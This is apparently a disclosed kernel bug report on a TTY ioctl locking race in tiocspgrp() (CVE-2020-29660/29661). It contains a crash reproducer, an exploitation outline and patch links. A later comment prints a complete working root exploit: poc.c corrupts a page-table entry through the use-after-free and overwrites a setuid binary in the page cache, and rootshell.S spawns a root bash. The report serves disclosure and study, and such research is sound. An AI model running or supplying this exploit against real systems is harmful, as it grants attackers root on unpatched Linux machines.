tiocspgrp(), the handler for the TIOCSPGRP ioctl, has the following signature:

static int tiocspgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t __user *p)

It receives two tty_struct pointers because, for PTY pairs, userspace can issue
the same ioctl() on either side of the pair, with slightly different semantics.
tty points to the side whose file descriptor userspace passed to ioctl()
(either the TTY or the master), while real_tty always points to the TTY.

tiocspgrp() contains the following code:

static int tiocspgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t __user *p)
{
[...]
        spin_lock_irq(&tty->ctrl_lock);
        put_pid(real_tty->pgrp);
        real_tty->pgrp = get_pid(pgrp);
        spin_unlock_irq(&tty->ctrl_lock);
[...]
}

It always modifies the ->pgrp of the TTY but, depending on the file descriptor
passed in by the caller, sometimes takes the ->ctrl_lock of the master instead.
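
To make the lock mismatch concrete, here is a minimal userspace model. Every name in it (model_tty, model_lock, resolve_real_tty() and so on) is a hypothetical stand-in, not a kernel definition, and the "consistent" variant is only one plausible correction assumed for illustration; it is not quoted from the patches.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical userspace stand-ins; these are NOT the kernel's structures. */
struct model_lock { int id; };

struct model_tty {
  struct model_lock ctrl_lock;
  struct model_tty *link;   /* other side of the PTY pair */
  int is_master;
};

/* Mirrors the description above: real_tty is always the TTY side. */
struct model_tty *resolve_real_tty(struct model_tty *tty) {
  assert(tty != NULL);
  if (!tty->is_master)
    return tty;
  assert(tty->link != NULL);
  return tty->link;
}

/* Lock choice as in the quoted code: whichever side the caller used. */
struct model_lock *pgrp_lock_as_quoted(struct model_tty *tty) {
  return &tty->ctrl_lock;
}

/* Assumed correction: always the lock of the side that owns ->pgrp. */
struct model_lock *pgrp_lock_consistent(struct model_tty *tty) {
  return &resolve_real_tty(tty)->ctrl_lock;
}

/* Returns 1 if both entry points end up using the same lock, else 0. */
int same_lock_for_both_sides(struct model_lock *(*pick)(struct model_tty *)) {
  struct model_tty master = { .ctrl_lock = { 1 }, .is_master = 1 };
  struct model_tty slave  = { .ctrl_lock = { 2 }, .is_master = 0 };
  master.link = &slave;
  slave.link = &master;
  return pick(&master) == pick(&slave);
}
```

Calling same_lock_for_both_sides(pgrp_lock_as_quoted) yields 0 (two different locks guard one pointer), while same_lock_for_both_sides(pgrp_lock_consistent) yields 1.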

This means that it is possible to race TIOCSPGRP on the master with TIOCSPGRP on
the TTY.
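
The effect of such a race on the reference counts can be replayed deterministically in userspace. The sketch below is only a model under stated assumptions: model_pid, the step functions and the starting counts are invented for illustration, and the interleaving is chosen by hand rather than produced by real concurrency.

```c
#include <assert.h>

/* Hypothetical stand-in for struct pid: only the refcount is modelled. */
struct model_pid { int count; };

struct model_pid *model_get_pid(struct model_pid *pid) {
  pid->count++;
  return pid;
}

void model_put_pid(struct model_pid *pid) {
  assert(pid->count > 0);
  pid->count--;
}

/* The update from the quoted code, split into its two steps. */
void step_put_old(struct model_pid **pgrp) {
  model_put_pid(*pgrp);              /* put_pid(real_tty->pgrp); */
}

void step_store_new(struct model_pid **pgrp, struct model_pid *new_pgrp) {
  *pgrp = model_get_pid(new_pgrp);   /* real_tty->pgrp = get_pid(pgrp); */
}

/*
 * Two CPUs both switch ->pgrp from old_pid to new_pid.
 * interleaved != 0: A puts, B puts, A stores, B stores (no common lock).
 * interleaved == 0: A runs completely, then B runs completely.
 * The outputs are the deviations from the correct final counts.
 */
void run_updates(int interleaved, int *old_error, int *new_error) {
  /* Assumed starting counts; old_pid's count includes the ->pgrp reference. */
  struct model_pid old_pid = { 10 }, new_pid = { 10 };
  struct model_pid *pgrp = &old_pid;

  if (interleaved) {
    step_put_old(&pgrp);             /* CPU A drops old_pid */
    step_put_old(&pgrp);             /* CPU B drops old_pid again */
    step_store_new(&pgrp, &new_pid); /* CPU A stores new_pid */
    step_store_new(&pgrp, &new_pid); /* CPU B overwrites without a put */
  } else {
    step_put_old(&pgrp);
    step_store_new(&pgrp, &new_pid);
    step_put_old(&pgrp);             /* now drops new_pid, as intended */
    step_store_new(&pgrp, &new_pid);
  }
  *old_error = old_pid.count - 9;    /* correct: the ->pgrp reference is gone */
  *new_error = new_pid.count - 11;   /* correct: one ->pgrp reference gained */
}
```

With the hand-picked interleaving, the old struct pid ends up one reference too low and the new one a reference too high; in the serialized order both counts come out correct.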

The following reproducer quickly causes errors (e.g. starting with a
"refcount_t: addition on 0; use-after-free." message):

======================================================================
#define _GNU_SOURCE
#include <err.h>
#include <unistd.h>
#include <fcntl.h>
#include <termios.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/prctl.h>
#include <sys/ioctl.h>
#include <sys/wait.h>

int main(void) {
  sync(); /* we're probably gonna crash... */

  /*
   * We may already be process group leader but want to be session leader;
   * therefore, do everything in a child process.
   */
  pid_t main_task = fork();
  if (main_task == -1) err(1, "initial fork");
  if (main_task != 0) {
    int status;
    if (waitpid(main_task, &status, 0) != main_task)
      err(1, "waitpid main_task");
    return 0;
  }
  if (prctl(PR_SET_PDEATHSIG, SIGKILL))
    err(1, "PR_SET_PDEATHSIG");
  if (getppid() == 1) exit(0);

  /* basic preparation */
  if (signal(SIGTTOU, SIG_IGN) == SIG_ERR)
    err(1, "signal");
  if (setsid() == -1)
    err(1, "start new session");

  /* set up a new pty pair */
  int ptmx = open("/dev/ptmx", O_RDWR);
  if (ptmx == -1)
    err(1, "open ptmx");
  unlockpt(ptmx);
  int tty = open(ptsname(ptmx), O_RDWR);
  if (tty == -1)
    err(1, "open tty");

  /*
   * Let a series of children change the ->pgrp pointer
   * protected by the tty's ctrl_lock...
   */
  pid_t child = fork();
  if (child == -1)
    err(1, "fork");
  if (child == 0) {
    if (prctl(PR_SET_PDEATHSIG, SIGKILL))
      err(1, "PR_SET_PDEATHSIG");
    if (getppid() == 1) exit(0);

    while (1) {
      pid_t grandchild = fork();
      if (grandchild == -1)
        err(1, "fork grandchild");
      if (grandchild == 0) {
        if (setpgid(0, 0))
          err(1, "setpgid");
        int pgrp = getpid();
        if (ioctl(tty, TIOCSPGRP, &pgrp))
          err(1, "TIOCSPGRP (tty)");
        exit(0);
      }
      int status;
      if (waitpid(grandchild, &status, 0) != grandchild)
        err(1, "waitpid for grandchild");
    }
  }

  /*
   * ... while the parent changes the same ->pgrp pointer under the
   * ctrl_lock of the other side of the pty pair.
   */
  while (1) {
    int pgrp = getpid();
    if (ioctl(ptmx, TIOCSPGRP, &pgrp))
      err(1, "TIOCSPGRP (ptmx)");
  }
}
======================================================================

This seems to me like it would be fairly promising as a target for exploitation;
for example, a strategy along the following lines might work:

 - enter a deeply nested PID namespace, such that you have a SLUB cache like
   pid_10 to yourself
 - take a bunch of references to two struct pid instances (e.g. through pidfds
   or procfs?)
 - try to hit the bug in a loop such that the refcounts are hopefully off by a
   bit, but both struct pid instances still exist
 - on both struct pid, drop references one by one until one is freed
 - to detect reallocation, try to get SLUB to reuse the object for another PID,
   then check something like pidfd_show_fdinfo() or tiocgsid() on the old pid
   (which mostly dump plain data from a struct pid without touching other
   stuff in there)
 - get the entire SLUB high-order page freed, and try to reallocate it into
   another slab
 - exploit the resulting type confusion, e.g. by changing the refcount of the
   freed struct pid

I haven't tried that yet though.

I'm going to send suggested patches for this issue and for less severe TTY
locking problems around the ->session pointer in a minute.
(The ->session stuff is sufficiently theoretical that it probably doesn't really
need the full security treatment, but I figured it'd be less messy if I include
both here...)
I have done some basic testing of these changes; the only thing that shows up as
a problem is a lockdep warning about a possible deadlock when triggering the SAK
logic via sysrq (involving console_lock, termios_rwsem and tty_bufhead::lock),
but that also happens on master and doesn't seem related to my changes.

This bug is subject to a 90 day disclosure deadline. After 90 days elapse,
the bug report will become visible to the public. The scheduled disclosure
date is 2021-03-03. Disclosure at an earlier date is possible if
the bug has been fixed in Linux stable releases (per agreement with
security@kernel.org folks).


Comments

ja...@google.com <ja...@google.com> #2 Dec 4, 2020 08:41AM

My suggested patches just landed in the subsystem tree:

main fix:
https://git.kernel.org/pub/scm/linux/kernel/git/gregkh/tty.git/commit/?h=tty-linus&id=54ffccbf053b5b6ca4f6e45094b942fab92a25fc

other locking fix:
https://git.kernel.org/pub/scm/linux/kernel/git/gregkh/tty.git/commit/?h=tty-linus&id=c8bcd9c5be24fb9e6132e97da5a35e55a83e36b9

ja...@google.com <ja...@google.com> #3 Dec 7, 2020 01:15AM

fixes are merged into Linus' tree:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d49248eb25a223b238cd7687ea92b080f595a323

ja...@google.com <ja...@google.com> #4 Dec 12, 2020 01:33PM

Marked as fixed.
Fixed in stable releases from 2020-12-11:
4.4.248
4.9.248
4.14.212
4.19.163
5.4.83
5.9.14

and in mainline in 5.11

ja...@google.com <ja...@google.com> #6 Oct 19, 2021 05:02PM

```
user@deb10:~/tiocspgrp$ cat Makefile
poc: poc.c rootshell
        gcc -Wall -o poc poc.c

rootshell: rootshell.o
        ld -o rootshell rootshell.o --nmagic

rootshell.o: rootshell.S
        as -o rootshell.o rootshell.S

user@deb10:~/tiocspgrp$ cat rootshell.S
.code64
.section .text, "ax"

.globl _start
_start:

/* setuid */
mov $105, %eax
mov $0, %edi
syscall

/* execve */
mov $59, %eax
lea shell_str(%rip), %rdi
lea argv(%rip), %rsi
lea envv(%rip), %rdx
syscall

int $3

shell_str:
.asciz "/bin/bash"
argv:
.quad shell_str
.quad 0
envv:
.quad 0
user@deb10:~/tiocspgrp$ cat poc.c
#define _GNU_SOURCE
#include <err.h>
#include <errno.h>
#include <sched.h>
#include <unistd.h>
#include <fcntl.h>
#include <termios.h>
#include <signal.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/prctl.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/mman.h>
#include <sys/epoll.h>
#include <sys/syscall.h>
#include <sys/eventfd.h>
#include <sys/resource.h>
#include <linux/bpf.h>

/*
 * How far the refcount of struct pid should be elevated before trying
 * to skew it down; determined by the multiplication of the two parameters.
 */
#define SOCKS_FOR_CREDS 100
#define CREDS_PER_SOCKET 100

/*
 * How often to attempt the race.
 * If this program crashes in the initial stage, lower this number.
 * A decent exploit might ramp up this number exponentially,
 * or something like that.
 */
#define SKEW_ATTEMPTS 50000

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

void pin_cpu(int cpu) {
  cpu_set_t cpuset;
  CPU_ZERO(&cpuset);
  CPU_SET(cpu, &cpuset);
  SYSCHK(sched_setaffinity(0, sizeof(cpuset), &cpuset));
}

/*
 * We want the child to be able to close its parent's file descriptors.
 */
#define fork() syscall(__NR_clone, CLONE_FILES|SIGCHLD, NULL, NULL, NULL, 0)

static int epfd = -1;

/*
 * Fill one SLUB page (32 objects).
 * One of the objects is a seq_file (so that we can free it synchronously to
 * shove the page onto the pcpu partial list), the rest are epoll items because
 * those aren't as messy in terms of fd usage and such.
 * Note that we run this without knowing the state of the current SLUB page, so
 * usually the allocated objects actually span two SLUB pages.
 * But if you run this repeatedly, each returned seq_file should be on its own
 * SLUB page, more or less.
 */
static int fill_one_page(void) {
  const int DUPFD_COUNT = 31;
  int fd = SYSCHK(eventfd(0, 0));
  int dupfds[DUPFD_COUNT];
  for (int i=0; i<DUPFD_COUNT; i++) {
    dupfds[i] = SYSCHK(dup(fd));
    struct epoll_event epev = {
      .events = EPOLLERR,
      .data = { .u64 = 0x0123456701234567 }
    };
    SYSCHK(epoll_ctl(epfd, EPOLL_CTL_ADD, dupfds[i], &epev));
  }
  for (int i=0; i<DUPFD_COUNT; i++)
    close(dupfds[i]);
  /* leave original fd open to avoid removal of epis */

  int seqfd = SYSCHK(open("/proc/meminfo", O_RDONLY));
  return seqfd;
}

/* load a 4KB BPF program. for await_rcu_call(). */
int load_dummy_bpf_prog(void) {
  struct bpf_insn insns[] = {
    {
      .code = BPF_ALU64 | BPF_MOV | BPF_K,
      .dst_reg = BPF_REG_0,
      .imm = 0
    }, {
      .code = BPF_JMP | BPF_EXIT
    }
  };
  union bpf_attr attr = {
    .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
    .insn_cnt = 2,
    .insns = (unsigned long)insns,
    .license = (unsigned long)""
  };
  errno = 0;
  return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}

/*
 * Wait for queued RCU callbacks from this CPU to execute.
 * On newer kernels we could use MEMBARRIER_CMD_GLOBAL, which is easier,
 * but on 4.19 the RCU flavors haven't been merged yet and membarrier only
 * waits for an rcu-sched grace period.
 * So instead we abuse that BPF only decrements the memory accounting of
 * BPF programs after an RCU grace period.
 */
void await_rcu_call(void) {
  printf("waiting for RCU call...\n");

  struct rlimit rlim, rlim_orig;
  SYSCHK(getrlimit(RLIMIT_MEMLOCK, &rlim_orig));
  rlim.rlim_cur = 0;
  rlim.rlim_max = rlim_orig.rlim_max;

  int bpf_res;
  while (1) {
    SYSCHK(setrlimit(RLIMIT_MEMLOCK, &rlim));

    bpf_res = load_dummy_bpf_prog();
    printf("bpf load with rlim 0x%lx: %d (%m)\n", (unsigned long)rlim.rlim_cur, bpf_res);
    if (bpf_res == -1 && errno == EPERM) {
      rlim.rlim_cur += 0x1000;
      continue;
    }
    if (bpf_res == -1)
      err(1, "unable to load bpf program");
    printf("bpf load success with rlim 0x%lx: got fd %d\n", (unsigned long)rlim.rlim_cur, bpf_res);
    break;
  }
  /* We have exhausted our deliberately lowered RLIMIT_MEMLOCK here. */

  /*
   * Close the BPF program to schedule freeing up its memory
   * after an RCU grace period.
   */
  close(bpf_res);
  while (1) {
    bpf_res = load_dummy_bpf_prog();
    if (bpf_res != -1)
      break;
    printf(".");
  }
  printf("\n");
  printf("RCU callbacks executed\n");
}

struct sockaddr_un unix_addr = {
  .sun_family = AF_UNIX,
  .sun_path = "/tmp/exploitsocket"
};

/*
 * Add @count to a struct pid by connecting @count times
 * to a socket on which the owner of that pid called listen().
 * This lets us increment the refcount of a pid even after the
 * task is already gone.
 */
void add_to_refcount(int count, int listensock) {
  for (int i=0; i<count; i++) {
    int refsock = SYSCHK(socket(AF_UNIX, SOCK_STREAM, 0));
    SYSCHK(connect(refsock, (struct sockaddr *)&unix_addr, sizeof(unix_addr)));
    SYSCHK(accept(listensock, NULL, NULL));
  }
}

int main(void) {
  setbuf(stdout, NULL);
  sync(); /* we're probably gonna crash... */

  printf("starting up...\n");

  epfd = SYSCHK(epoll_create1(0));

  /*
   * We'll be relying on percpu freelist behavior.
   * If the kernel migrated us to another CPU in the middle of that,
   * that would be bad for us.
   * So tell the kernel not to do that.
   */
  pin_cpu(0);

  uid_t myuid = getuid();
  gid_t mygid = getgid();

  /*
   * We may already be process group leader but want to be session leader;
   * therefore, do everything in a child process.
   */
  pid_t main_task = SYSCHK(fork());
  if (main_task != 0) {
    int status;
    if (waitpid(main_task, &status, 0) != main_task)
      err(1, "waitpid main_task");
    return 0;
  }
  SYSCHK(prctl(PR_SET_PDEATHSIG, SIGKILL));
  if (getppid() == 1) exit(0);

  printf("executing in first level child process, setting up session and PTY pair...\n");

  /* basic preparation */
  SYSCHK(signal(SIGTTOU, SIG_IGN));
  SYSCHK(setsid());

  /* set up a new pty pair */
  int ptmx = SYSCHK(open("/dev/ptmx", O_RDWR));
  unlockpt(ptmx);
  int tty = SYSCHK(open(ptsname(ptmx), O_RDWR));

  /* shared memory for cross-process synchronization */
  volatile int *syncptr = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS, -1, 0);
  if ((void*)syncptr == MAP_FAILED)
    err(1, "mmap shared");

  /* for references to the child pid */
  printf("setting up unix sockets for ucreds spam...\n");
  int sockpair_refhold[SOCKS_FOR_CREDS][2];
  for (int i=0; i<SOCKS_FOR_CREDS; i++)
    SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, sockpair_refhold[i]));

  /*
   * This socket will later be given a reference to the child's pid on listen().
   * Connecting to it will give the client an extra reference to the child's pid,
   * lifting the pid's refcount.
   * Unlike most other places that non-ephemerally increment pid refcounts, this
   * allows us to easily lift the refcount of a pid that is no longer associated
   * with any task.
   */
  int listensock = SYSCHK(socket(AF_UNIX, SOCK_STREAM, 0));
  unlink(unix_addr.sun_path);
  SYSCHK(bind(listensock, (struct sockaddr *)&unix_addr, sizeof(unix_addr)));

  /*
   * Drain the percpu and node partial pages of the slab
   * to get into a pristine state.
   */
  printf("draining pcpu and node partial pages\n");
  for (int i=0; i<50; i++)
    fill_one_page();

  /*
   * Prepare the necessary VMAs for spraying page tables later.
   * We will later want to spray 30 L1 page tables, each of which will contain
   * one PTE every 128 bytes (since that is our SLUB object size).
   * Also ensure that the allocation of those L1 page tables won't cause
   * allocation of higher-level page tables.
   */
  char *suid_path = "/usr/bin/ntfs-3g";
  int suid_fd = SYSCHK(open(suid_path, O_RDONLY));
  if (mmap((void*)0x10003ffff000, 0x1000, PROT_READ, MAP_SHARED|MAP_FIXED_NOREPLACE, suid_fd, 0) == MAP_FAILED)
    err(1, "mmap to materialize L2 table and above");
  *(volatile char *)0x10003ffff000;
  for (int i=0; i<32 * 30; i++) {
    if (mmap((void*)(0x100000000000 + i * 16 * 0x1000), 0x1000, PROT_READ, MAP_SHARED|MAP_FIXED_NOREPLACE, suid_fd, 0) == MAP_FAILED)
      err(1, "mmap suid binary");
  }

  /*
   * Prepare ~40 pages filled with objects; we'll later have to shove a
   * bunch of pages into the percpu partial list to flush its contents.
   */
  printf("preparing for flushing pcpu partial pages\n");
#define NUM_DRAIN_FDS 40
  int drain_fds[NUM_DRAIN_FDS];
  for (int i=0; i<NUM_DRAIN_FDS; i++)
    drain_fds[i] = fill_one_page();

  /*
   * The child pid should be in a page together with a bunch of seqfiles
   * allocations and nothing else.
   */
  int seqfiles[32*2];
  for (int i=0; i<32; i++)
    seqfiles[i] = SYSCHK(open("/proc/self/maps", O_RDONLY));

  printf("launching child process\n");
  int parent = getpid();
  pid_t child = SYSCHK(fork());
  if (child == 0) {
    SYSCHK(prctl(PR_SET_PDEATHSIG, SIGKILL));

    /* we should be on another CPU to race with our parent */
    pin_cpu(1);

    /* create post-death-incrementable pid reference */
    SYSCHK(listen(listensock, 128/*SOMAXCONN*/));

    SYSCHK(setpgid(0, 0));
    child = getpid();

    /*
     * Creates SOCKS_FOR_CREDS*CREDS_PER_SOCKET pending unix domain socket
     * messages, each one with SCM_CREDENTIALS that lift the refcount of
     * the child's `struct pid` by 1 each.
     */
    for (int sockidx = 0; sockidx < SOCKS_FOR_CREDS; sockidx++) {
      for (int refs_held = 0; refs_held < CREDS_PER_SOCKET; refs_held++) {
        struct iovec iov = { .iov_base = "a", .iov_len = 1 };
        struct __attribute__((aligned(8))) {
          struct cmsghdr hdr;
          struct ucred ucred;
        } controldata = {
          .hdr = {
            .cmsg_len = sizeof(struct cmsghdr)+sizeof(struct ucred),
            .cmsg_level = SOL_SOCKET,
            .cmsg_type = SCM_CREDENTIALS
          },
          .ucred = { .pid = child, .uid = myuid, .gid = mygid }
        };
        struct msghdr hdr = {
          .msg_iov = &iov,
          .msg_iovlen = 1,
          .msg_control = &controldata,
          .msg_controllen = sizeof(controldata)
        };
        int ret = sendmsg(sockpair_refhold[sockidx][0], &hdr, MSG_DONTWAIT);
        if (ret <= 0) {
          err(1, "sendmsg failed, CREDS_PER_SOCKET is probably too high");
          break;
        }
      }
    }
    printf("ucreds spam done, struct pid refcount should be lifted. starting to skew refcount...\n");

    for (int attempts = 0; attempts < SKEW_ATTEMPTS; attempts++) {
      while (1) {
        char syncval = *syncptr;
        if ((syncval&1) == 0) {
          if (syncval == 10)
            break;
          *syncptr = syncval + 1;
        }
      }
      /* update child -> parent (races, may leave child refcount too low and parent refcount too high) */
      SYSCHK(ioctl(tty, TIOCSPGRP, &parent));
      *syncptr = 11;
    }
    printf("refcount should now be skewed, child exiting\n");
    exit(0);
  }
  printf("child is %d\n", child);

  for (int attempts = 0; attempts < SKEW_ATTEMPTS; attempts++) {
    /* update parent -> child (does not race) */
    SYSCHK(ioctl(ptmx, TIOCSPGRP, &child));

    *syncptr = 0;
    while (1) {
      char syncval = *syncptr;
      if ((syncval&1) == 1) {
        *syncptr = syncval + 1;
        /* at 9, we first bump to 10 so that the child can go ahead, then also go ahead ourselves */
        if (syncval == 9)
          break;
      }
    }

    /* update child -> parent (races, may leave child refcount too low and parent refcount too high) */
    SYSCHK(ioctl(ptmx, TIOCSPGRP, &parent));

    while (*syncptr != 11) /*wait*/;
  }
  int status;
  pid_t wait_res = waitpid(child, &status, 0);
  if (wait_res != child)
    err(1, "wait for child");
  if (WIFEXITED(status)) {
    printf("child exited cleanly\n");
  } else {
    errx(1, "child died weirdly");
  }

  /* drain the CPU slab */
  for (int i=32; i<64; i++)
    seqfiles[i] = SYSCHK(open("/proc/self/maps", O_RDONLY));

  /* let's make sure that the child drops its RCU reference on the pid before we do anything else */
  await_rcu_call();

  printf("gonna try to free the pid...\n");
  /*
   * free the pid and intentionally crash with a sort of double-free (actually
   * usually because the SLUB freelist pointer clobbers pid->level with garbage)
   */
  *syncptr = 0;
  pid_t df_child = fork();
  if (df_child == -1) err(1, "fork");
  if (df_child == 0) {
    for (int sockidx = 0; sockidx < SOCKS_FOR_CREDS; sockidx++) {
      for (int refs = 0; refs < CREDS_PER_SOCKET; refs++) {
        char dummy;
        if (read(sockpair_refhold[sockidx][1], &dummy, 1) != 1)
          err(1, "read from sockpair_refhold failed with syscall return???");
        (*syncptr)++;
      }
    }
    errx(1, "unexpectedly all socket data was flushed out successfully?");
  }
  int df_status;
  if (waitpid(df_child, &df_status, 0) != df_child)
    err(1, "waitpid");
  if (!WIFSIGNALED(df_status))
    errx(1, "double-free child did not die due to signal?");
  printf("double-free child died with signal %d after dropping %d references (%d%%)\n",
      WTERMSIG(df_status), *syncptr,
      100 * (*syncptr) / (SOCKS_FOR_CREDS * CREDS_PER_SOCKET));

  /* free all allocations in the slab page, putting it on the pcpu partial list */
  for (int i=0; i<64; i++)
    SYSCHK(close(seqfiles[i]));

  /*
   * Flush the pcpu partial list.
   * Our slab page should get freed onto the percpu order-0 page freelist
   * for nonmovable zone-normal pages; the others stay because they still have
   * active allocations.
   */
  for (int i=0; i<NUM_DRAIN_FDS; i++)
    close(drain_fds[i]);

  /* try to reallocate as page tables, with RO PTEs in every possible refcount position */
  for (int i=0; i<32 * 30; i++)
    *(volatile char*)(0x100000000000 + i * 16 * 0x1000);
  printf("hopefully reallocated as an L1 pagetable now\n");

  /* try to make the PTE writable (0x2) and dirty (0x40) */
  add_to_refcount(0x42, listensock);
  printf("PTE forcibly marked WRITE | DIRTY (hopefully)\n");

  /*
   * Try to copy the contents of our "rootshell" file into the setuid
   * executable through the corrupted PTE.
   * Since we don't know which address is the right one, and we don't
   * want to deal with catching SIGSEGV in userspace, just let the kernel
   * do the write for us via copy_to_user().
   * Note that we may still have stale RO TLB entries, which may cause
   * "spurious faults", which the kernel won't fix up when they happen
   * from userspace; but taking a spurious fault removes the stale TLB
   * entry, and it should then work on the second try. So try each
   * address twice.
   */
  int rootshell_fd = open("rootshell", O_RDONLY);
  struct stat rootshell_st;
  SYSCHK(fstat(rootshell_fd, &rootshell_st));
  bool suid_corrupted = false;
  for (int i=0; i<32 * 30; i++) {
    char *addr = (char*)(0x100000000000 + i * 16 * 0x1000);
    for (int j=0; j<2; j++) {
      int res = pread(rootshell_fd, addr, rootshell_st.st_size, 0);
      if (res == -1) {
        if (errno != EFAULT)
          perror("read into possibly-corrupted PTE failed");
        continue;
      }
      printf("clobber via corrupted PTE succeeded in page %d, 128-byte-allocation index %d, returned %d\n", i/32, i%32, res);
      suid_corrupted = true;
    }
  }

  /*
   * Flip back the writable and dirty bits, so that the kernel doesn't get
   * confused when it stumbles over dirty PTEs for a file that isn't supposed
   * to be writable. Don't worry, kernel, these are just normal read-only PTEs,
   * nothing to see here.
   * Annoyingly, we can't just decrement the references we took back down
   * because put_pid() loads an index from the UAF'ed allocation and tries to
   * use it to index into an array, which would blow up. The only way we can go
   * is up!
   * Therefore, we add more references such that the writable and dirty bits
   * disappear through the carry and some higher bit is set. That higher bit
   * being the PAT bit.
   */
  add_to_refcount(0x80-0x42, listensock);

  if (!suid_corrupted) {
    printf("the end\n");
    while (1)
      pause();
  }

  /*
   * Launch the setuid executable; the copy of it in the page cache will
   * have been overwritten with our <4KiB root shell helper.
   */
  pid_t exec_child = SYSCHK(fork());
  if (exec_child == 0) {
    execl(suid_path, suid_path, NULL);
    err(1, "execl failed");
  }

  int exec_status;
  if (waitpid(exec_child, &exec_status, 0) != exec_child)
    perror("waitpid");

  printf("parent is staying alive to prevent unwanted heap damage, don't kill this process!\n");
  while (1)
    pause();
}
user@deb10:~/tiocspgrp$
```
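
The arithmetic behind the two add_to_refcount() calls in poc.c can be worked through on the low byte of a PTE. The sketch below assumes that the refcount overlaps the low bits of an x86-64 4KiB PTE, and that the read-only PTE starts out as present, user-accessible and accessed (0x25). That starting value is an assumption for illustration, as are the helper names.

```c
#include <assert.h>
#include <stdint.h>

/* x86-64 flag bits in the low byte of a 4KiB-page PTE. */
#define PTE_PRESENT  0x01u
#define PTE_RW       0x02u
#define PTE_USER     0x04u
#define PTE_ACCESSED 0x20u
#define PTE_DIRTY    0x40u
#define PTE_PAT      0x80u

/* Taking references is plain integer addition on the overlapping bits. */
uint32_t add_refs(uint32_t low_bits, uint32_t count) {
  return low_bits + count;
}

/* Assumed starting point: present, user, accessed, read-only, clean. */
uint32_t example_ro_pte(void) {
  return PTE_PRESENT | PTE_USER | PTE_ACCESSED;
}

/* Walks through both additions and checks each intermediate value. */
void walk_through(void) {
  uint32_t pte = example_ro_pte();
  assert(pte == 0x25);

  /* First call: 0x42 references set RW (0x2) and DIRTY (0x40). */
  uint32_t writable = add_refs(pte, 0x42);
  assert(writable == 0x67);
  assert((writable & PTE_RW) && (writable & PTE_DIRTY));

  /* Second call: 0x80-0x42 more references, so 0x80 in total. */
  uint32_t restored = add_refs(writable, 0x80 - 0x42);
  assert(restored == 0xa5);
  assert(!(restored & (PTE_RW | PTE_DIRTY)));
  assert(restored & PTE_PAT);
}
```

Because bits 1 and 6 start out clear, adding 0x42 sets exactly those two bits; topping the total up to 0x80 carries them away and leaves only bit 7 (PAT) additionally set, which matches the comment in poc.c about flipping the bits back without ever decrementing.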

Related CVE Numbers: CVE-2020-29660, CVE-2020-29661.

Credit: Jann Horn